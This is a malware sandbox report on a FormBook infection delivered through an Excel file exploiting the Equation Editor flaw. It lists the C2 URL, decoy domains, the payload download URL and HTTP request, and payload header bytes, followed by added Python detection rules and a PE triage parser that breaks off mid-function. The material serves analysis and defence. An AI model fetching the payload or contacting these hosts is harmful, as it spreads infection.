
Windows Analysis Report
TedarikciSiparisi_83613 .xlsx

Overview

General Information

Sample Name: TedarikciSiparisi_83613 .xlsx
Analysis ID: 626598
MD5: 650bb8e5fe570bde782be21c4e9f421c
SHA1: fd3ffa031546f1dfa7ed884689ca1e85941fca1e
SHA256: 247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
Tags: VelvetSweatshop (the workbook is encrypted with Excel's default password, which Excel opens transparently but which defeats naive static scanning), xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3032 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2584 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2600 cmdline: "C:\Users\Public\vbc.exe" MD5: CE42FE431B88922AB59B6FD880CADCF6)
      • aspnet_compiler.exe (PID: 2336 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 6D0C232D1F4CD357FD7C14ED6FABFA90)
  • cleanup
{"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
Source | Rule | Description | Author | Strings
00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x73130:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x734ba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7f1cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x7ecb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x7f2cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x7f447:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x73ed2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x7df34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x74c4a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x846bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x85762:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x815f1:$sqlite3step: 68 34 1C 7B E1
    • 0x81704:$sqlite3step: 68 34 1C 7B E1
    • 0x81620:$sqlite3text: 68 38 2A 90 C5
    • 0x81745:$sqlite3text: 68 38 2A 90 C5
    • 0x81633:$sqlite3blob: 68 53 D8 7F 8C
    • 0x8175b:$sqlite3blob: 68 53 D8 7F 8C
    Source | Rule | Description | Author | Strings
    2.3.EQNEDT32.EXE.6cecd8.0.raw.unpack | APT_NK_Methodology_Artificial_UserAgent_IE_Win7 | Detects hard-coded User-Agent string that has been present in several APT37 malware families. | Steve Miller aka @stvemillertime
    • 0x1728:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x1728:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...

    Exploits

    Source: Network Connection | Author: Joe Security | Data: DestinationIp: 180.214.238.224, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    No Snort rule has matched
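The two Sigma events above, re-implemented as detection logic. This is an added example and not part of the Joe Sandbox report: the rules below mirror the findings this page names ("EQNEDT32.EXE connecting to internet", "File Dropped By EQNEDT32EXE", "Office equation editor starts processes" and "TCP traffic detected without corresponding DNS query") over Sysmon-style events constructed from the PIDs, paths and address on this page. The event list is constructed, not sandbox output; the Sysmon EventID numbers and field names, and the executable-extension list, are assumptions of the example.

```python
"""Host and network rules for the EQNEDT32.EXE chain this report records.

Added example, not part of the Joe Sandbox report. It re-implements, over
Sysmon-style events,the detections named on this page: the Sigma hits
"EQNEDT32.EXE connecting to internet" and "File Dropped By EQNEDT32EXE", the
signature "Office equation editor starts processes", and the network finding
"TCP traffic detected without corresponding DNS query". The events are
constructed from the PIDs, paths and address on the page, not exported from
the sandbox; EventID numbers and field names follow Sysmon (1 process create,
3 network connect, 11 file create, 22 DNS query).
"""
from collections import defaultdict

EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
IE_CACHE = r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P"

# Equation Editor is launched over COM ("-Embedding"), so the process tree
# shows it beside EXCEL.EXE rather than under it; a rule keyed on an Office
# parent would miss it. Every rule below keys on the EQNEDT32.EXE image.
EVENTS = [
    {"EventID": 3, "Image": EQNEDT32, "ProcessId": 2584, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.22", "SourcePort": 49171, "DestinationIp": "180.214.238.224", "DestinationPort": 80},
    {"EventID": 11, "Image": EQNEDT32, "ProcessId": 2584, "TargetFilename": IE_CACHE + r"\vbc[1].exe"},
    {"EventID": 11, "Image": EQNEDT32, "ProcessId": 2584, "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": 1, "Image": r"C:\Users\Public\vbc.exe", "ProcessId": 2600,
     "ParentImage": EQNEDT32, "ParentProcessId": 2584},
    # Benign control: Excel writing its own lock file must not trigger anything.
    {"EventID": 11, "Image": EXCEL, "ProcessId": 3032,
     "TargetFilename": r"C:\Users\user\Desktop\~$TedarikciSiparisi_83613 .xlsx"},
]

# Extensions treated as executable content (an assumption of this example).
EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".vbs", ".js", ".ps1", ".bat")

def is_eqnedt(path):
    return path.upper().endswith("\\EQNEDT32.EXE")

# Each rule returns the PID the hit is attributed to, or None for no match.
def eqnedt_network_connection(ev, _resolved):
    """Sigma "EQNEDT32.EXE connecting to internet": the editor never needs sockets."""
    if ev["EventID"] == 3 and is_eqnedt(ev["Image"]) and ev.get("Initiated"):
        return ev["ProcessId"]

def eqnedt_drops_executable(ev, _resolved):
    """Sigma "File Dropped By EQNEDT32EXE", narrowed to executable content. The
    IE-cache copy is URLDownloadToFileW's side effect, the Public copy is the payload."""
    if ev["EventID"] == 11 and is_eqnedt(ev["Image"]) and ev["TargetFilename"].lower().endswith(EXEC_EXT):
        return ev["ProcessId"]

def eqnedt_spawns_process(ev, _resolved):
    """Signature "Office equation editor starts processes", attributed to the parent PID."""
    if ev["EventID"] == 1 and is_eqnedt(ev.get("ParentImage", "")):
        return ev["ParentProcessId"]

def connection_without_dns(ev, resolved):
    """Finding "TCP traffic detected without corresponding DNS query": a hard-coded IP."""
    if ev["EventID"] == 3 and ev.get("Initiated") and ev["DestinationIp"] not in resolved:
        return ev["ProcessId"]

RULES = [eqnedt_network_connection, eqnedt_drops_executable, eqnedt_spawns_process, connection_without_dns]

def resolved_ips(events):
    """Addresses answered in EventID 22 (QueryResults is ';'-separated; simplified parse)."""
    ips = set()
    for ev in events:
        if ev.get("EventID") == 22:
            ips.update(p for p in ev.get("QueryResults", "").split(";") if p[:1].isdigit())
    return ips

def run_rules(events):
    """Return [(rule name, attributed PID, event)] for every rule that matches an event."""
    resolved = resolved_ips(events)
    hits = []
    for ev in events:
        for rule in RULES:
            pid = rule(ev, resolved)
            if pid is not None:
                hits.append((rule.__name__, pid, ev))
    return hits

def chains_by_pid(hits):
    """Rule names per attributed PID. Connect + drop + spawn on one PID is the
    URLDownloadToFileW -> ShellExecuteExW chain the report's code functions show."""
    chains = defaultdict(set)
    for name, pid, _ in hits:
        chains[pid].add(name)
    return dict(chains)

def is_download_execute_chain(rule_names):
    return {"eqnedt_network_connection", "eqnedt_drops_executable", "eqnedt_spawns_process"} <= rule_names

if __name__ == "__main__":
    for pid, names in chains_by_pid(run_rules(EVENTS)).items():
        verdict = "download-and-execute chain" if is_download_execute_chain(names) else "partial"
        print(pid, sorted(names), verdict)
```

On the constructed events every rule attributes to PID 2584 (the process-creation hit is attributed to the parent, so the chain stays on Equation Editor) and the Excel lock file fires nothing. The DNS rule flags the connection because no EventID 22 answer contains 180.214.238.224, which is exactly the condition the report records; in production it needs a short time window and the DNS cache taken into account to avoid false positives on long-lived resolutions.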

    AV Detection

    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
    Source: TedarikciSiparisi_83613 .xlsx | ReversingLabs: Detection: 34%
    Source: Yara match | File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: http://180.214.238.224/__cloud_for_file/vbc.exe | Avira URL Cloud: Label: malware
    Source: www.mentalnayaarifmetika.online/ocgr/ | Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | ReversingLabs: Detection: 41%
    Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 41%
    Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | Joe Sandbox ML: detected

    Exploits

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 180.214.238.224 Port: 80
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp

    Software Vulnerabilities

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036306A9 ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036306C7 ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03630648 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03630531 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0363054D URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03630692 ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305D7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80
    Source: excel.exe | Memory has grown: Private usage: 4MB later: 63MB

    Networking

    Source: Malware configuration extractor | URLs: www.mentalnayaarifmetika.online/ocgr/
    Source: Joe Sandbox View | ASN Name: VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP VN
    Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Sat, 14 May 2022 13:14:18 GMT
    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
    Last-Modified: Fri, 13 May 2022 09:07:10 GMT
    ETag: "38000-5dee0ffdad130"
    Accept-Ranges: bytes
    Content-Length: 229376
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 
08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 0
    Source: global traffic | HTTP traffic detected:
    GET /__cloud_for_file/vbc.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 180.214.238.224
    Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: unknown | TCP traffic detected without corresponding DNS query: 180.214.238.224 (reported 50 times)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe
    Source: EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe95C:
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeX
    Source: EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exehhC:
    Source: EQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exej
    Source: EQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeu
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC1A5DE.emf
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: global traffic | HTTP traffic detected:
    GET /__cloud_for_file/vbc.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 180.214.238.224
    Connection: Keep-Alive
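Triage of the download captured in this section, as an added example that is not part of the Joe Sandbox report. The HTTP response is rebuilt from the header values and the leading "Data Raw" bytes printed above (CRLF line endings are assumed, since the report shows the headers run together), and only the first 0x228 body bytes are reused, laid out field by field: the DOS and PE headers, the section table and the start of the .NET CLR header. The parser answers what a responder wants from such a capture: whether the body is a PE, when it was built, whether it is .NET, whether Content-Length agrees with the section table, and how much of the file is embedded resource data. The field layout follows the PE/COFF and ECMA-335 specifications; nothing beyond the bytes on the page is assumed about the file itself.

```python
"""Triage of the vbc.exe download captured above: HTTP response and PE header.

Added example, not part of the Joe Sandbox report. The response is rebuilt from
the header values and "Data Raw" bytes printed in the Networking section (CRLF
line endings assumed). Only the first 0x228 body bytes are reused, laid out
field by field: DOS/PE headers, section table and the start of the .NET CLR
header. The parser reports: is it a PE, when was it built, is it .NET, does
Content-Length agree with the section table, how much is managed resource data.
"""
import struct
from datetime import datetime, timezone

RESPONSE_HEAD = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sat, 14 May 2022 13:14:18 GMT\r\n"
    b"Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28\r\n"
    b"Last-Modified: Fri, 13 May 2022 09:07:10 GMT\r\n"
    b'ETag: "38000-5dee0ffdad130"\r\n'
    b"Accept-Ranges: bytes\r\n"
    b"Content-Length: 229376\r\n"
    b"Keep-Alive: timeout=5, max=100\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-msdownload\r\n\r\n"
)

BODY_PREFIX = bytes.fromhex(
    "4d5a 9000 0300 0000 0400 0000 ffff 0000 b800 0000 0000 0000 4000 0000"  # IMAGE_DOS_HEADER up to e_lfarlc
    + "00" * 32 + "80000000"                                                  # e_res..e_res2, e_lfanew = 0x80
    "0e1fba0e00b409cd21b8014ccd21"                                            # DOS stub code
) + b"This program cannot be run in DOS mode.\r\r\n$" + b"\x00" * 7 + bytes.fromhex(
    "50450000 4c01 0300 ba1f7e62 00000000 00000000 e000 2e01"    # PE\0\0, i386, 3 sections, TimeDateStamp, opt size, chars
    "0b01 06 00 00760300 007c0300 00000000 ca950300 00200000"    # PE32, linker 6.0, code/data sizes, entry point, BaseOfCode
    "00a00300 00004000 00200000 00020000 0400 0000 0000 0000"    # BaseOfData, ImageBase, alignments, OS/image versions
    "0400 0000 00000000 00e00300 00020000 00000000 0200 6085"    # subsystem ver, SizeOfImage, SizeOfHeaders, GUI, DllChars
    "00001000 00100000 00001000 00100000 00000000 10000000"      # stack/heap sizes, LoaderFlags, NumberOfRvaAndSizes
    "00000000 00000000  70950300 57000000  00c00300 c8050000  00000000 00000000"  # export, import, resource, exception
    "00000000 00000000  00a00300 0c000000  18500300 1c000000  00000000 00000000"  # security, basereloc, debug, arch
    "00000000 00000000  00000000 00000000  00000000 00000000  00000000 00000000"  # globalptr, tls, loadconfig, bound import
    "00200000 08000000  00000000 00000000  08200000 48000000  00000000 00000000"  # IAT, delay import, CLR header, reserved
    "2e74657874000000 d0750300 00200000 00760300 00020000" + "00" * 12 + "20000060"  # .text  CODE|EXECUTE|READ
    "2e72656c6f630000 0c000000 00a00300 00020000 00780300" + "00" * 12 + "40000042"  # .reloc IDATA|DISCARDABLE|READ
    "2e72737263000000 c8050000 00c00300 00060000 007a0300" + "00" * 12 + "40000040"  # .rsrc  IDATA|READ
    + "00" * 16 + "ac950300 00000000"                                                   # pad to 0x200, IAT (_CorExeMain)
    "48000000 0200 0500 9c500300 d4440000 03000200 03000006 083d0000 10130300"          # IMAGE_COR20_HEADER to Resources
)

def split_response(raw):
    """Split an HTTP/1.1 response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def rva_to_offset(rva, sections):
    for _, vaddr, rawsize, rawptr in sections:
        if vaddr <= rva < vaddr + rawsize:
            return rva - vaddr + rawptr
    raise ValueError("RVA outside raw sections: %#x" % rva)

def parse_pe_header(data):
    """Triage fields from a PE32/PE32+ prefix, plus the .NET CLR header when present."""
    if data[:2] != b"MZ":
        raise ValueError("body is not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
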